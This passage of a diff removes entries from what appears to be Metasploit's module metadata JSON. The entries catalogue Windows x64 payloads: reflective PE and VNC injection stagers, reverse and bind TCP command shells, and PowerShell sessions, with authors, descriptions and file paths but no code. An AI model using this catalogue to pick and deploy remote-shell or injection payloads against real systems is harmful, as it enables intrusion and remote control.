and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_windows/x64/peinject/bind_tcp_rc4": { - "name": "Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_windows/x64/peinject/bind_tcp_uuid": { - "name": "Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/peinject/reverse_named_pipe": { - "name": "Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_windows/x64/peinject/reverse_tcp": { - "name": "Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/peinject/reverse_tcp_rc4": { - "name": "Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/peinject/reverse_tcp_uuid": { - "name": "Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/pingback_reverse_tcp": { - "name": "Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/windows/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Connect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/powershell_bind_tcp": { - "name": "Windows Interactive Powershell Session, Bind TCP", - "fullname": "payload/windows/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/powershell_reverse_tcp": { - "name": "Windows Interactive Powershell Session, Reverse TCP", - "fullname": "payload/windows/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/powershell_reverse_tcp_ssl": { - "name": "Windows Interactive Powershell Session, Reverse TCP SSL", - "fullname": "payload/windows/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session over SSL", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "windows/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/shell/bind_ipv6_tcp": { - "name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/windows/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/shell/bind_ipv6_tcp_uuid": { - "name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/windows/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_windows/x64/shell/bind_named_pipe": { - "name": "Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "UserExistsError" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/shell/bind_tcp": { - "name": "Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_windows/x64/shell/bind_tcp_rc4": { - "name": "Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_windows/x64/shell/bind_tcp_uuid": { - "name": "Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/shell/reverse_tcp": { - "name": "Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/shell/reverse_tcp_rc4": { - "name": "Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/shell/reverse_tcp_uuid": { - "name": "Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/shell_bind_tcp": { - "name": "Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/windows/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Listen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/shell_reverse_tcp": { - "name": "Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/windows/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Connect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/vncinject/bind_ipv6_tcp": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/windows/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/windows/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_windows/x64/vncinject/bind_named_pipe": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "UserExistsError" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/vncinject/bind_tcp": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_windows/x64/vncinject/bind_tcp_rc4": { - "name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_windows/x64/vncinject/bind_tcp_uuid": { - "name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/vncinject/reverse_http": { - "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], 